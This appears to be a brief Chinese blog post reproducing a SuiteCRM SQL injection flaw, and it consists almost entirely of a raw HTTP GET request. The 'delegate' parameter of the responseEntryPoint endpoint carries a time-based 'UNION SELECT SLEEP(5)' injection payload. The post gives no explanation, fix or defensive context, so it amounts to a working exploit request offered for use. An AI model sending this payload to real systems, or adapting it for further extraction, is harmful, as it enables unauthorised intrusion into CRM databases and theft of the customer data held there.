Babing
Published on 2024-08-30 / 0 Visits
0
0

S39-1SuiteCRM-SQL

S39-1SuiteCRM-SQL

漏洞复现:

payload:

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Comment